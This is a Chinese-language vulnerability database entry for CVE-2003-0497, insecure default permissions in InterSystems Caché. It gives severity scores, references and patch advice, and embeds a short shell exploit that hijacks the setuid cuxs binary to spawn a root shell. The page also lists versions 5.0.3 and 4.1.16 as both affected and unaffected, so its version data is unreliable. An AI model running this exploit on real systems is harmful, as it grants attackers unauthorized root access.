CVE-2003-0497
CVSS7.2
发布时间 :2003-08-07 00:00:00
修订时间 :2012-05-11 21:22:33
NMCOES    

[原文]Caché Database 5.x installs /cachesys/bin/cache with world-writable permissions, which allows local users to gain privileges by modifying cache and executing it via cuxs.


[CNNVD]InterSystems Cache不安全默认权限漏洞(CNNVD-200308-048)

        
        InterSystems Cach

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0497
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0497
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-048
(官方数据源) CNNVD

- 其它链接及资源

http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=7
(UNKNOWN)  IDEFENSE  20030701 Caché Insecure Installation File and Directory Permissions

- 漏洞信息

InterSystems Cache不安全默认权限漏洞
高危 权限许可和访问控制
2003-08-07 00:00:00 2010-05-11 00:00:00
本地  
        
        InterSystems Cach

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 管理员对目录和文件设置安全的访问权限。
        厂商补丁:
        InterSystems
        ------------
        InterSystems Cache 5.0.3和4.1.16版本将不受此漏洞影响,不过目前还没有提供下载:
        
        http://www.intersystems.com/support/flash/index.html

- 漏洞信息 (22847)

InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability (EDBID:22847)
linux local
2003-07-01 Verified
0 Larry W. Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET
		

- 漏洞信息

2229
Caché Database /cachesys/bin/cache Weak Permission Local Privilege Escalation
Local Access Required Other
Loss of Integrity Workaround, Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-07-01 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

InterSystems Cache Insecure Default Permissions Vulnerability
Configuration Error 8070
No Yes
2003-07-01 12:00:00 2009-07-11 10:56:00
Discovered by Larry W. Cashdollar <lwc@vapid.ath.cx>.

- 受影响的程序版本

InterSystems Cache 5.0.2
InterSystems Cache 5.0.1
InterSystems Cache 5.0
InterSystems Cache 4.1.15
InterSystems Cache 5.0.3
InterSystems Cache 4.1.16

- 不受影响的程序版本

InterSystems Cache 5.0.3
InterSystems Cache 4.1.16

- 漏洞讨论

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

- 漏洞利用

Though there is no exploit code required, the following exploit script has been made available:

- 解决方案

The vendor has released versions 5.0.3 and 4.1.16 to address this issue. Please contact the vendor for further information on obtaining fixed versions of affected packages.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站